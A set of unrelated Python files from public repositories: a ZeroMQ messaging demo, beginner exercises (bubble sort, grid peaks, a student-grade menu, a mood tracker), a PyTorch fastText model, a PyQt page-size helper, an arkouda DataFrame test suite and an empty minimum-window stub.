19374063297 | import zmq
import time
import numpy as np
import multiprocessing as mp
# import signal
# import sys
# def signal_handler(sig, frame):
# print("Keyboard interrupt received. Exiting...")
# sys.exit(0)
# signal.signal(signal.SIGINT, signal_handler)
class GPCRequester(mp.Process):
def __init__(self, queue: mp.Queue, address: str = "localhost", port: int = 5555):
super(GPCRequester, self).__init__()
self.queue = queue
self.url = f"tcp://{address}:{port}"
def run(self) -> None:
context = zmq.Context()
socket = context.socket(zmq.PAIR)
socket.connect(self.url)
print("Connected to GPC server")
while True:
try:
data, timestamp = self.queue.get()
socket.send_string("Send GPC")
except KeyboardInterrupt:
break
socket.close()
class GPCServer(mp.Process):
def __init__(self, address: str = "*", port: int = 5555):
super(GPCServer, self).__init__()
self.url = f"tcp://{address}:{port}"
def run(self) -> None:
context = zmq.Context()
socket = context.socket(zmq.PAIR)
socket.bind(self.url)
print("GPC server started")
while True:
try:
msg = socket.recv_string()
print(msg)
except KeyboardInterrupt:
break
socket.close()
def main():
# queue = mp.Queue()
gpc_server = GPCServer()
gpc_server.start()
# gpc_requester = GPCRequester(queue)
# gpc_requester.start()
# for i in range(10):
# queue.put((i, time.time()))
# time.sleep(1)
# gpc_requester.terminate()
# gpc_server.terminate()
# gpc_requester.join()
gpc_server.join()
if __name__ == "__main__":
main()
| localization-as-a-service/liloc-demo | communication_sim.py | communication_sim.py | py | 1,936 | python | en | code | 0 | github-code | 13 |
16069156190 | def Bubble_Sort(a):
b=len(a)-1
for i in range(b):
for y in range(b-i):
if a[y]>a[y+1]:
a[y],a[y+1]=a[y+1],a[y]
return a
a=[]
n=int(input('Enter the size: '))
for j in range(n):
num=input()
a.append(num)
Bubble_Sort(a)
print('\nSorted array: ')
for i in range(n):
print(a[i])
| Shusovan/Basic-Python-Programming | Bubble Sort.py | Bubble Sort.py | py | 355 | python | en | code | 2 | github-code | 13 |
31015659683 | #-*- codeing=utf-8 -*-
#@time: 2020/8/26 9:49
#@Author: Shang-gang Lee
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
class fasttext(nn.Module):
def __init__(self, vocab_size, embedding_dim, class_nums):
super().__init__()
self.embedding=nn.Embedding(vocab_size,embedding_dim) #[batch_size,words,embedding_dims]
self.hidden=nn.AdaptiveAvgPool2d((1,embedding_dim)) #[batch_size,embedding_dims]
self.fc=nn.Linear(embedding_dim,class_nums) #[batch_size,class_nums]
def forward(self,x):
embed=self.embedding(x)
avgEmbed=self.hidden(embed)
avgEmbed=avgEmbed.squeeze(dim=1)
output=self.fc(avgEmbed)
output=F.softmax(output,dim=1)
return output
model=fasttext(vocab_size=2000,embedding_dim=100,class_nums=5)
input=torch.randint(low=0,high=2000,size=[64,50])
pred=model(input)
loss_fucntion=nn.CrossEntropyLoss()
optimizer=optim.SGD(model.parameters(),lr=0.001)
| shanggangli/Research-in-NLP | units/FastTextModel.py | FastTextModel.py | py | 1,028 | python | en | code | 0 | github-code | 13 |
74211540817 |
from PyQt5.QtGui import QPagedPaintDevice # !! Not in QtPrintSupport
from qtPrintFramework.pageLayout.model.adaptedModel import AdaptedModel, AdaptedSortedModel
class AdaptedPageNameToEnumModel(AdaptedSortedModel): # !!! Sorted
'''
Dictionary from name to page enum.
From Qt's enum.
Static, a fixed set for use with paperless printers (PDF) that can 'print' to any size you specify.
'''
def _createValues(self, printerAdaptor=None):
''' See super. '''
'''
Dictionary keyed by names of page sizes, of enum values.
For all page sizes in QPagedPaintDevice enum.
A current printer might support a different set. Typically a subset.
(Depends on physical paper loaded in physical trays.)
!!! Alternate design: Custom is in model.
Here, we are excluding it from this model used only by the framework's Page Setup PDF dialog.
!!! No i18n for page names: assume names are internationally recognized.
'''
self.value = AdaptedSortedModel._getAdaptedDictionary(enumOwningClass=QPagedPaintDevice,
enumType=QPagedPaintDevice.PageSize) # !!! Paper/Page confusion
assert isinstance(self.value, dict)
self._deleteCustomPaper()
print(self.value)
def _deleteCustomPaper(self):
self.value.pop("Custom", None)
pageNameToEnum = AdaptedPageNameToEnumModel().value # singleton
pageEnumToName = AdaptedModel._getAdaptedReverseDictionary(enumOwningClass=QPagedPaintDevice,
enumType=QPagedPaintDevice.PageSize) | bootchk/qtPrintFramework | qtPrintFramework/pageLayout/model/pageNameToEnum.py | pageNameToEnum.py | py | 1,615 | python | en | code | 2 | github-code | 13 |
219880823 | import sys
# sys.stdin = open("input.txt", "rt")
'''
n = int(input())
arr = []
zeros = [0] * (n + 2)
arr.append(zeros)
for _ in range(n):
tmp = [0] + list(map(int, input().split())) + [0]
arr.append(tmp)
arr.append(zeros)
cnt = 0
for i in range(1, n + 1):
for j in range(1, n + 1):
comp = [arr[i - 1][j],
arr[i + 1][j],
arr[i][j - 1],
arr[i][j + 1]]
for element in comp:
if arr[i][j] <= element:
break
else:
cnt += 1
print(cnt)
'''
n = int(input())
arr = [list(map(int, input().split())) for _ in range(n)]
arr.insert(0, [0] * n)
arr.append([0] * n)
for row in arr:
row.insert(0, 0)
row.append(0)
di = [-1, 0, 1, 0]
dj = [0, 1, 0, -1]
cnt = 0
for i in range(1, n + 1):
for j in range(1, n + 1):
if all(arr[i][j] > arr[i + di[k]][j + dj[k]] for k in range(4)):
cnt += 1
print(cnt)
| ignis535/baekjoon | 탐색 & 시뮬레이션/봉우리.py | 봉우리.py | py | 958 | python | en | code | 0 | github-code | 13 |
29018022835 | #함수 이름은 변경 가능합니다.
class NotnumberOfdata(Exception):
def __init__(self):
super().__init__('Num of data is not 3!')
class AlreadyExist(Exception):
def __init__(self):
super().__init__('Already exist name ')
class NotInteger(Exception):
def __init__(self):
super().__init__('Score is not positive integer! ')
class NoNewGradeStudent(Exception):
def __init__(self):
super().__init__('학점을 새로 부여할 학생이 존재하지않습니다!')
class NoneStudent(Exception):
def __init__(self):
super().__init__('No student data!')
class ExistNoneGradeStudent(Exception):
def __init__(self):
super().__init__("There is a student who didn't get grade!")
def Menu1(x) :
x[1]=int(x[1])
x[2]=int(x[2])
name=x[0]
m_score=x[1]
f_score=x[2]
student.append(name)
studentInfo.insert(student.index(name),{'name':name,'m_score':m_score,'f_score':f_score, 'grade':'none'})
def Menu2(i):
if (studentInfo[i]['m_score']+studentInfo[i]['f_score'])//2>=90:
studentInfo[i]['grade']='A'
elif (studentInfo[i]['m_score']+studentInfo[i]['f_score'])//2>=80:
studentInfo[i]['grade']='B'
elif (studentInfo[i]['m_score']+studentInfo[i]['f_score'])//2>=70:
studentInfo[i]['grade']='C'
else:
studentInfo[i]['grade']='D'
def Menu3():
print('---------------------------------')
print(' name mid final grade')
print('---------------------------------')
for i in range(len(student)):
print(' %5s %3d %5d %5s'%(studentInfo[i]['name'],studentInfo[i]['m_score'],studentInfo[i]['f_score'],studentInfo[i]['grade']))
def Menu4(deleteStd):
del studentInfo[student.index(deleteStd)]
del student[student.index(deleteStd)]
student=[]
studentInfo=[]
it_is=True
count=0
print("*Menu*******************************")
print("1. Inserting students Info(name score1 score2)")
print("2. Grading")
print("3. Printing students Info")
print("4. Deleting students Info")
print("5. Exit program")
print("*************************************")
while True :
choice = input("Choose menu 1, 2, 3, 4, 5 : ")
if choice == "1":
try:
x=list(map(str,input('Enter name mid-score final-score: ').split()))
if len(x)!=3:
raise NotnumberOfdata
if x[0] in student:
raise AlreadyExist
try:
x[1]=int(x[1])
x[2]=int(x[2])
except ValueError:
it_is=False
print('Score is not positive integer!')
continue
else:
if it_is:
if x[1]<0 or x[2]<0:
raise NotInteger
except Exception as e:
print(e)
else:
Menu1(x)
elif choice == "2":
count=0
try:
if len(student)==0:
raise NoneStudent
for i in range(len(student)):
if studentInfo[i]['grade']=='none':
count+=1
Menu2(i)
if count==0:
raise NoNewGradeStudent
except Exception as e:
print(e)
else:
print('Grading to all students')
elif choice == "3" :
try:
if len(student)==0:
raise NoneStudent
for i in range(len(student)):
if studentInfo[i]['grade']=='none':
raise ExistNoneGradeStudent
except Exception as e:
print(e)
else:
Menu3()
elif choice == "4" :
try:
if len(student)==0:
raise NoneStudent
except Exception as e:
print(e)
else:
deleteStd=input('Enter the name to delete :')
if deleteStd not in student:
print('Not exist name!')
else:
Menu4(deleteStd)
print('%s information is deleted.'%deleteStd)
elif choice == "5" :
print('Exit Program!')
break
else:
print('Wrong number.Choose again')
| kkl4846/KimKyunglin | python_problem/studentprogram.py | studentprogram.py | py | 4,432 | python | en | code | 0 | github-code | 13 |
70136628498 | import datetime
# Define a dictionary to store mood data for each day of the week
moods = {}
# Define a list of mood options
mood_options = ['Happy', 'Sad', 'Excited', 'Angry', 'Calm']
# Get the current day of the week
current_day = datetime.datetime.now().strftime("%A")
# Prompt the user to enter their mood for the current day
while True:
print(f"How do you feel on {current_day}? (Choose from {', '.join(mood_options)}): ")
mood = input()
# Validate user input
if mood in mood_options:
moods[current_day] = mood
break
else:
print("Invalid mood. Please choose from the available options.")
# Display the results to the user
print("\nHere's how you've been feeling this week:")
for day, mood in moods.items():
print(f"{day}: {mood}")
| Ellnutt/Feeling | moodtrk.py | moodtrk.py | py | 790 | python | en | code | 2 | github-code | 13 |
35735181288 | # Exercise 5: Bottle Deposits
def bottle_deposit():
# Reading container count for each size from user
one_ltr_cost = 0.01
one_ltr_more_cst = 0.25
one_ltr_less = int(input("enter number of container which are less than or euqal to 1 liter:"))
one_ltr_more = int(input("enter number of containers which ar more than 1 liter size:"))
# Computing refund for the container
refund = one_ltr_less * one_ltr_cost + one_ltr_more * one_ltr_more_cst
print("Your total refund is :", round(refund, 2), "$")
bottle_deposit()
| KashyapTushar/kashyaptushar.github.io | Python_Workbook/Ex5_Bottle_Deposit.py | Ex5_Bottle_Deposit.py | py | 551 | python | en | code | 0 | github-code | 13 |
32045617830 | import numpy as np
import pandas as pd
import pytest
from pandas.testing import assert_frame_equal, assert_series_equal
import arkouda as ak
class TestDataFrame:
@staticmethod
def build_pd_df():
username = ["Alice", "Bob", "Alice", "Carol", "Bob", "Alice"]
userid = [111, 222, 111, 333, 222, 111]
item = [0, 0, 1, 1, 2, 0]
day = [5, 5, 6, 5, 6, 6]
amount = [0.5, 0.6, 1.1, 1.2, 4.3, 0.6]
bi = [2**200, 2**200 + 1, 2**200 + 2, 2**200 + 3, 2**200 + 4, 2**200 + 5]
ui = (np.arange(6).astype(ak.uint64)) + 2**63
return pd.DataFrame(
{
"userName": username,
"userID": userid,
"item": item,
"day": day,
"amount": amount,
"bi": bi,
"ui": ui,
}
)
@staticmethod
def build_ak_df():
return ak.DataFrame(TestDataFrame.build_pd_df())
@staticmethod
def build_pd_df_duplicates():
username = ["Alice", "Bob", "Alice", "Carol", "Bob", "Alice"]
userid = [111, 222, 111, 333, 222, 111]
item = [0, 1, 0, 2, 1, 0]
day = [5, 5, 5, 5, 5, 5]
return pd.DataFrame({"userName": username, "userID": userid, "item": item, "day": day})
@staticmethod
def build_ak_df_duplicates():
return ak.DataFrame(TestDataFrame.build_pd_df_duplicates())
@staticmethod
def build_ak_append():
username = ak.array(["John", "Carol"])
userid = ak.array([444, 333])
item = ak.array([0, 2])
day = ak.array([1, 2])
amount = ak.array([0.5, 5.1])
bi = ak.array([2**200 + 6, 2**200 + 7])
ui = ak.array([6, 7], dtype=ak.uint64) + 2**63
return ak.DataFrame(
{
"userName": username,
"userID": userid,
"item": item,
"day": day,
"amount": amount,
"bi": bi,
"ui": ui,
}
)
@staticmethod
def build_pd_df_append():
username = ["Alice", "Bob", "Alice", "Carol", "Bob", "Alice", "John", "Carol"]
userid = [111, 222, 111, 333, 222, 111, 444, 333]
item = [0, 0, 1, 1, 2, 0, 0, 2]
day = [5, 5, 6, 5, 6, 6, 1, 2]
amount = [0.5, 0.6, 1.1, 1.2, 4.3, 0.6, 0.5, 5.1]
bi = (np.arange(8) + 2**200).tolist()
ui = (np.arange(8).astype(ak.uint64)) + 2**63
return pd.DataFrame(
{
"userName": username,
"userID": userid,
"item": item,
"day": day,
"amount": amount,
"bi": bi,
"ui": ui,
}
)
@staticmethod
def build_ak_keyerror():
userid = ak.array([444, 333])
item = ak.array([0, 2])
return ak.DataFrame({"user_id": userid, "item": item})
@staticmethod
def build_ak_typeerror():
username = ak.array([111, 222, 111, 333, 222, 111])
userid = ak.array(["Alice", "Bob", "Alice", "Carol", "Bob", "Alice"])
item = ak.array([0, 0, 1, 1, 2, 0])
day = ak.array([5, 5, 6, 5, 6, 6])
amount = ak.array([0.5, 0.6, 1.1, 1.2, 4.3, 0.6])
bi = ak.arange(2**200, 2**200 + 6)
ui = ak.arange(6, dtype=ak.uint64) + 2**63
return ak.DataFrame(
{
"userName": username,
"userID": userid,
"item": item,
"day": day,
"amount": amount,
"bi": bi,
"ui": ui,
}
)
@pytest.mark.parametrize("size", pytest.prob_size)
def test_dataframe_creation(self, size):
# Validate empty DataFrame
df = ak.DataFrame()
assert isinstance(df, ak.DataFrame)
assert df.empty
# Validation of Creation from Pandas
pddf = pd.DataFrame(
{
"int": np.arange(size),
"uint": np.random.randint(0, size / 2, size, dtype=np.uint64),
"bigint": np.arange(2**200, 2**200 + size),
"bool": np.random.randint(0, 1, size=size, dtype=bool),
"segarray": [np.random.randint(0, size / 2, 2) for i in range(size)],
}
)
akdf = ak.DataFrame(pddf)
assert isinstance(akdf, ak.DataFrame)
assert len(akdf) == size
assert_frame_equal(pddf, akdf.to_pandas())
# validation of creation from dictionary
akdf = ak.DataFrame(
{
"int": ak.arange(size),
"uint": ak.array(pddf["uint"]),
"bigint": ak.arange(2**200, 2**200 + size),
"bool": ak.array(pddf["bool"]),
"segarray": ak.SegArray.from_multi_array([ak.array(x) for x in pddf["segarray"]]),
}
)
assert isinstance(akdf, ak.DataFrame)
assert len(akdf) == size
assert_frame_equal(pddf, akdf.to_pandas())
# validation of creation from list
x = [
np.arange(size),
np.random.randint(0, 5, size),
np.random.randint(5, 10, size),
]
pddf = pd.DataFrame(x)
akdf = ak.DataFrame([ak.array(val) for val in list(zip(*x))])
assert isinstance(akdf, ak.DataFrame)
assert len(akdf) == len(pddf)
# arkouda does not allow for numeric columns.
assert akdf.columns == [str(x) for x in pddf.columns.values]
# use the columns from the pandas created for equivalence check
# these should be equivalent
ak_to_pd = akdf.to_pandas()
ak_to_pd.columns = pddf.columns
assert_frame_equal(pddf, ak_to_pd)
def test_client_type_creation(self):
f = ak.Fields(ak.arange(10), ["A", "B", "c"])
ip = ak.ip_address(ak.arange(10))
d = ak.Datetime(ak.arange(10))
bv = ak.BitVector(ak.arange(10), width=4)
df_dict = {"fields": f, "ip": ip, "date": d, "bitvector": bv}
df = ak.DataFrame(df_dict)
pd_d = [pd.to_datetime(x, unit="ns") for x in d.to_list()]
pddf = pd.DataFrame(
{"fields": f.to_list(), "ip": ip.to_list(), "date": pd_d, "bitvector": bv.to_list()}
)
assert_frame_equal(pddf, df.to_pandas())
# validate that set max_rows adjusts the repr properly
shape = f"({df._shape_str()})".replace("(", "[").replace(")", "]")
pd.set_option("display.max_rows", 4)
s = df.__repr__().replace(f" ({df._shape_str()})", f"\n\n{shape}")
assert s == pddf.__repr__()
pddf = pd.DataFrame({"a": list(range(1000)), "b": list(range(1000))})
pddf["a"] = pddf["a"].apply(lambda x: "AA" + str(x))
pddf["b"] = pddf["b"].apply(lambda x: "BB" + str(x))
df = ak.DataFrame(pddf)
assert_frame_equal(pddf, df.to_pandas())
pd.set_option("display.max_rows", 10)
shape = f"({df._shape_str()})".replace("(", "[").replace(")", "]")
s = df.__repr__().replace(f" ({df._shape_str()})", f"\n\n{shape}")
assert s == pddf.__repr__()
def test_boolean_indexing(self):
df = self.build_ak_df()
ref_df = self.build_pd_df()
row = df[df["userName"] == "Carol"]
assert len(row) == 1
assert ref_df[ref_df["userName"] == "Carol"].equals(row.to_pandas(retain_index=True))
def test_column_indexing(self):
df = self.build_ak_df()
ref_df = self.build_pd_df()
# index validation
assert isinstance(df.index, ak.Index)
assert df.index.to_list() == ref_df.index.to_list()
for cname in df.columns:
col, ref_col = getattr(df, cname), getattr(ref_df, cname)
assert isinstance(col, ak.Series)
assert col.to_list() == ref_col.to_list()
assert isinstance(df[cname], (ak.pdarray, ak.Strings, ak.Categorical))
assert df[cname].to_list() == ref_df[cname].to_list()
# check mult-column list
col_list = ["userName", "amount", "bi"]
assert isinstance(df[col_list], ak.DataFrame)
assert_frame_equal(df[col_list].to_pandas(), ref_df[col_list])
# check multi-column tuple
col_tup = ("userID", "item", "day", "bi")
assert isinstance(df[col_tup], ak.DataFrame)
# pandas only supports lists of columns, not tuples
assert_frame_equal(df[col_tup].to_pandas(), ref_df[list(col_tup)])
def test_dtype_prop(self):
str_arr = ak.random_strings_uniform(1, 5, 3)
df_dict = {
"i": ak.arange(3),
"c_1": ak.arange(3, 6, 1),
"c_2": ak.arange(6, 9, 1),
"c_3": str_arr,
"c_4": ak.Categorical(ak.array(["str"] * 3)),
"c_5": ak.SegArray(ak.array([0, 9, 14]), ak.arange(20)),
"c_6": ak.arange(2**200, 2**200 + 3),
}
akdf = ak.DataFrame(df_dict)
assert len(akdf.columns) == len(akdf.dtypes)
# dtypes returns objType for categorical, segarray. We should probably fix
# this and add a df.objTypes property. pdarrays return actual dtype
for ref_type, c in zip(
["int64", "int64", "int64", "str", "Categorical", "SegArray", "bigint"], akdf.columns
):
assert ref_type == str(akdf.dtypes[c])
def test_drop(self):
# create an arkouda df.
df = self.build_ak_df()
# create pandas df to validate functionality against
pd_df = self.build_pd_df()
# test out of place drop
df_drop = df.drop([0, 1, 2])
pddf_drop = pd_df.drop(labels=[0, 1, 2])
pddf_drop.reset_index(drop=True, inplace=True)
assert_frame_equal(pddf_drop, df_drop.to_pandas())
df_drop = df.drop("userName", axis=1)
pddf_drop = pd_df.drop(labels=["userName"], axis=1)
assert_frame_equal(pddf_drop, df_drop.to_pandas())
# Test dropping columns
df.drop("userName", axis=1, inplace=True)
pd_df.drop(labels=["userName"], axis=1, inplace=True)
assert_frame_equal(pd_df, df.to_pandas())
# Test dropping rows
df.drop([0, 2, 5], inplace=True)
# pandas retains original indexes when dropping rows, need to reset to line up with arkouda
pd_df.drop(labels=[0, 2, 5], inplace=True)
pd_df.reset_index(drop=True, inplace=True)
assert_frame_equal(pd_df, df.to_pandas())
# verify that index keys must be ints
with pytest.raises(TypeError):
df.drop("index")
# verify axis can only be 0 or 1
with pytest.raises(ValueError):
df.drop("amount", 15)
def test_drop_duplicates(self):
df = self.build_ak_df_duplicates()
ref_df = self.build_pd_df_duplicates()
dedup = df.drop_duplicates()
dedup_pd = ref_df.drop_duplicates()
# pandas retains original indexes when dropping dups, need to reset to line up with arkouda
dedup_pd.reset_index(drop=True, inplace=True)
dedup_test = dedup.to_pandas().sort_values("userName").reset_index(drop=True)
dedup_pd_test = dedup_pd.sort_values("userName").reset_index(drop=True)
assert_frame_equal(dedup_pd_test, dedup_test)
def test_shape(self):
df = self.build_ak_df()
row, col = df.shape
assert row == 6
assert col == 7
def test_reset_index(self):
df = self.build_ak_df()
slice_df = df[ak.array([1, 3, 5])]
assert slice_df.index.to_list() == [1, 3, 5]
df_reset = slice_df.reset_index()
assert df_reset.index.to_list() == [0, 1, 2]
assert slice_df.index.to_list(), [1, 3, 5]
slice_df.reset_index(inplace=True)
assert slice_df.index.to_list(), [0, 1, 2]
def test_rename(self):
df = self.build_ak_df()
rename = {"userName": "name_col", "userID": "user_id"}
# Test out of Place - column
df_rename = df.rename(rename, axis=1)
assert "user_id" in df_rename.columns
assert "name_col" in df_rename.columns
assert "userName" not in df_rename.columns
assert "userID" not in df_rename.columns
assert "userID" in df.columns
assert "userName" in df.columns
assert "user_id" not in df.columns
assert "name_col" not in df.columns
# Test in place - column
df.rename(column=rename, inplace=True)
assert "user_id" in df.columns
assert "name_col" in df.columns
assert "userName" not in df.columns
assert "userID" not in df.columns
# prep for index renaming
rename_idx = {1: 17, 2: 93}
conf = list(range(6))
conf[1] = 17
conf[2] = 93
# Test out of Place - index
df_rename = df.rename(rename_idx)
assert df_rename.index.values.to_list() == conf
assert df.index.values.to_list() == list(range(6))
# Test in place - index
df.rename(index=rename_idx, inplace=True)
assert df.index.values.to_list() == conf
def test_append(self):
df = self.build_ak_df()
df.append(self.build_ak_append())
ref_df = self.build_pd_df_append()
# dataframe equality returns series with bool result for each row.
assert_frame_equal(ref_df, df.to_pandas())
idx = np.arange(8)
assert idx.tolist() == df.index.index.to_list()
df_keyerror = self.build_ak_keyerror()
with pytest.raises(KeyError):
df.append(df_keyerror)
df_typeerror = self.build_ak_typeerror()
with pytest.raises(TypeError):
df.append(df_typeerror)
def test_concat(self):
df = self.build_ak_df()
glued = ak.DataFrame.concat([df, self.build_ak_append()])
ref_df = self.build_pd_df_append()
# dataframe equality returns series with bool result for each row.
assert_frame_equal(ref_df, glued.to_pandas())
df_keyerror = self.build_ak_keyerror()
with pytest.raises(KeyError):
ak.DataFrame.concat([df, df_keyerror])
df_typeerror = self.build_ak_typeerror()
with pytest.raises(TypeError):
ak.DataFrame.concat([df, df_typeerror])
def test_head(self):
df = self.build_ak_df()
ref_df = self.build_pd_df()
hdf = df.head(3)
hdf_ref = ref_df.head(3).reset_index(drop=True)
assert_frame_equal(hdf_ref, hdf.to_pandas())
def test_tail(self):
df = self.build_ak_df()
ref_df = self.build_pd_df()
tdf = df.tail(2)
tdf_ref = ref_df.tail(2).reset_index(drop=True)
assert_frame_equal(tdf_ref, tdf.to_pandas())
def test_groupby_standard(self):
df = self.build_ak_df()
gb = df.GroupBy("userName")
keys, count = gb.count()
assert keys.to_list() == ["Bob", "Alice", "Carol"]
assert count.to_list() == [2, 3, 1]
assert gb.permutation.to_list() == [1, 4, 0, 2, 5, 3]
gb = df.GroupBy(["userName", "userID"])
keys, count = gb.count()
assert len(keys) == 2
assert keys[0].to_list() == ["Carol", "Bob", "Alice"]
assert keys[1].to_list() == [333, 222, 111]
assert count.to_list() == [1, 2, 3]
# testing counts with IPv4 column
s = ak.DataFrame({"a": ak.IPv4(ak.arange(1, 5))}).groupby("a").count()
pds = pd.Series(
data=np.ones(4, dtype=np.int64),
index=pd.Index(data=np.array(["0.0.0.1", "0.0.0.2", "0.0.0.3", "0.0.0.4"], dtype="<U7")),
)
assert_series_equal(pds, s.to_pandas())
# testing counts with Categorical column
s = ak.DataFrame({"a": ak.Categorical(ak.array(["a", "a", "a", "b"]))}).groupby("a").count()
pds = pd.Series(data=np.array([3, 1]), index=pd.Index(data=np.array(["a", "b"], dtype="<U7")))
assert_series_equal(pds, s.to_pandas())
def test_gb_series(self):
df = self.build_ak_df()
gb = df.GroupBy("userName", use_series=True)
c = gb.count()
assert isinstance(c, ak.Series)
assert c.index.to_list() == ["Bob", "Alice", "Carol"]
assert c.values.to_list() == [2, 3, 1]
@pytest.mark.parametrize("agg", ["sum", "first"])
def test_gb_aggregations(self, agg):
df = self.build_ak_df()
pd_df = self.build_pd_df()
# remove strings col because many aggregations don't support it
cols_without_str = list(set(df.columns) - {"userName"})
df = df[cols_without_str]
pd_df = pd_df[cols_without_str]
group_on = "userID"
for col in df.columns:
if col == group_on:
# pandas groupby doesn't return the column used to group
continue
ak_ans = getattr(df.groupby(group_on), agg)(col)
pd_ans = getattr(pd_df.groupby(group_on), agg)()[col]
assert ak_ans.to_list() == pd_ans.to_list()
# pandas groupby doesn't return the column used to group
cols_without_group_on = list(set(df.columns) - {group_on})
ak_ans = getattr(df.groupby(group_on), agg)()[cols_without_group_on]
pd_ans = getattr(pd_df.groupby(group_on), agg)()[cols_without_group_on]
# we don't currently support index names in arkouda
pd_ans.index.name = None
assert_frame_equal(pd_ans, ak_ans.to_pandas(retain_index=True))
def test_argsort(self):
df = self.build_ak_df()
p = df.argsort(key="userName")
assert p.to_list() == [0, 2, 5, 1, 4, 3]
p = df.argsort(key="userName", ascending=False)
assert p.to_list() == [3, 4, 1, 5, 2, 0]
def test_coargsort(self):
df = self.build_ak_df()
p = df.coargsort(keys=["userID", "amount"])
assert p.to_list() == [0, 5, 2, 1, 4, 3]
p = df.coargsort(keys=["userID", "amount"], ascending=False)
assert p.to_list() == [3, 4, 1, 2, 5, 0]
def test_sort_values(self):
userid = [111, 222, 111, 333, 222, 111]
userid_ak = ak.array(userid)
# sort userid to build dataframes to reference
userid.sort()
df = ak.DataFrame({"userID": userid_ak})
ord = df.sort_values()
assert_frame_equal(pd.DataFrame(data=userid, columns=["userID"]), ord.to_pandas())
ord = df.sort_values(ascending=False)
userid.reverse()
assert_frame_equal(pd.DataFrame(data=userid, columns=["userID"]), ord.to_pandas())
df = self.build_ak_df()
ord = df.sort_values(by="userID")
ref_df = self.build_pd_df()
ref_df = ref_df.sort_values(by="userID").reset_index(drop=True)
assert_frame_equal(ref_df, ord.to_pandas())
ord = df.sort_values(by=["userID", "day"])
ref_df = ref_df.sort_values(by=["userID", "day"]).reset_index(drop=True)
assert_frame_equal(ref_df, ord.to_pandas())
with pytest.raises(TypeError):
df.sort_values(by=1)
def test_intx(self):
username = ak.array(["Alice", "Bob", "Alice", "Carol", "Bob", "Alice"])
userid = ak.array([111, 222, 111, 333, 222, 111])
df_1 = ak.DataFrame({"user_name": username, "user_id": userid})
username = ak.array(["Bob", "Alice"])
userid = ak.array([222, 445])
df_2 = ak.DataFrame({"user_name": username, "user_id": userid})
rows = ak.intx(df_1, df_2)
assert rows.to_list() == [False, True, False, False, True, False]
df_3 = ak.DataFrame({"user_name": username, "user_number": userid})
with pytest.raises(ValueError):
rows = ak.intx(df_1, df_3)
def test_apply_perm(self):
df = self.build_ak_df()
ref_df = self.build_pd_df()
ord = df.sort_values(by="userID")
perm_list = [0, 3, 1, 5, 4, 2]
default_perm = ak.array(perm_list)
ord.apply_permutation(default_perm)
ord_ref = ref_df.sort_values(by="userID").reset_index(drop=True)
ord_ref = ord_ref.reindex(perm_list).reset_index(drop=True)
assert_frame_equal(ord_ref, ord.to_pandas())
def test_filter_by_range(self):
userid = ak.array([111, 222, 111, 333, 222, 111])
amount = ak.array([0, 1, 1, 2, 3, 15])
df = ak.DataFrame({"userID": userid, "amount": amount})
filtered = df.filter_by_range(keys=["userID"], low=1, high=2)
assert filtered.to_list() == [False, True, False, True, True, False]
def test_copy(self):
username = ak.array(["Alice", "Bob", "Alice", "Carol", "Bob", "Alice"])
userid = ak.array([111, 222, 111, 333, 222, 111])
df = ak.DataFrame({"userName": username, "userID": userid})
df_copy = df.copy(deep=True)
assert_frame_equal(df.to_pandas(), df_copy.to_pandas())
df_copy.__setitem__("userID", ak.array([1, 2, 1, 3, 2, 1]))
assert df["userID"].to_list() != df_copy["userID"].to_list()
df_copy = df.copy(deep=False)
df_copy.__setitem__("userID", ak.array([1, 2, 1, 3, 2, 1]))
assert_frame_equal(df.to_pandas(), df_copy.to_pandas())
def test_isin(self):
df = ak.DataFrame({"col_A": ak.array([7, 3]), "col_B": ak.array([1, 9])})
# test against pdarray
test_df = df.isin(ak.array([0, 1]))
assert test_df["col_A"].to_list() == [False, False]
assert test_df["col_B"].to_list() == [True, False]
# Test against dict
test_df = df.isin({"col_A": ak.array([0, 3])})
assert test_df["col_A"].to_list() == [False, True]
assert test_df["col_B"].to_list() == [False, False]
# test against series
i = ak.Index(ak.arange(2))
s = ak.Series(data=ak.array([3, 9]), index=i.index)
test_df = df.isin(s)
assert test_df["col_A"].to_list() == [False, False]
assert test_df["col_B"].to_list() == [False, True]
# test against another dataframe
other_df = ak.DataFrame({"col_A": ak.array([7, 3], dtype=ak.bigint), "col_C": ak.array([0, 9])})
test_df = df.isin(other_df)
assert test_df["col_A"].to_list() == [True, True]
assert test_df["col_B"].to_list() == [False, False]
def test_multiindex_compat(self):
# Added for testing Issue #1505
df = ak.DataFrame({"a": ak.arange(10), "b": ak.arange(10), "c": ak.arange(10)})
df.groupby(["a", "b"]).sum("c")
def test_uint_greediness(self):
# default to uint when all supportedInt and any value > 2**63
# to avoid loss of precision see (#1983)
df = pd.DataFrame({"Test": [2**64 - 1, 0]})
assert df["Test"].dtype == ak.uint64
def test_head_tail_datetime_display(self):
# Reproducer for issue #2596
values = ak.array([1689221916000000] * 100, dtype=ak.int64)
dt = ak.Datetime(values, unit="u")
df = ak.DataFrame({"Datetime from Microseconds": dt})
# verify _get_head_tail and _get_head_tail_server match
assert df._get_head_tail_server().__repr__() == df._get_head_tail().__repr__()
def test_head_tail_resetting_index(self):
# Test that issue #2183 is resolved
df = ak.DataFrame({"cnt": ak.arange(65)})
# Note we have to call __repr__ to trigger head_tail_server call
bool_idx = df[df["cnt"] > 3]
bool_idx.__repr__()
assert bool_idx.index.index.to_list() == list(range(4, 65))
slice_idx = df[:]
slice_idx.__repr__()
assert slice_idx.index.index.to_list() == list(range(65))
# verify it persists non-int Index
idx = ak.concatenate([ak.zeros(5, bool), ak.ones(60, bool)])
df = ak.DataFrame({"cnt": ak.arange(65)}, index=idx)
bool_idx = df[df["cnt"] > 3]
bool_idx.__repr__()
# the new index is first False and rest True (because we lose first 4),
# so equivalent to arange(61, bool)
assert bool_idx.index.index.to_list() == ak.arange(61, dtype=bool).to_list()
slice_idx = df[:]
slice_idx.__repr__()
assert slice_idx.index.index.to_list() == idx.to_list()
def test_subset(self):
df = ak.DataFrame(
{
"a": ak.arange(100),
"b": ak.randint(0, 20, 100),
"c": ak.random_strings_uniform(0, 16, 100),
"d": ak.randint(25, 75, 100),
}
)
df2 = df[["a", "b"]]
assert ["a", "b"] == df2.columns
assert df.index.to_list() == df2.index.to_list()
assert df["a"].to_list() == df2["a"].to_list()
assert df["b"].to_list() == df2["b"].to_list()
| Bears-R-Us/arkouda | PROTO_tests/tests/dataframe_test.py | dataframe_test.py | py | 24,649 | python | en | code | 211 | github-code | 13 |
4593446825 | class Solution:
"""
@param source: A string
@param target: A string
@return: A string denote the minimum window
Return "" if there is no such a string
"""
def minWindow(self, source, target):
# write your code here
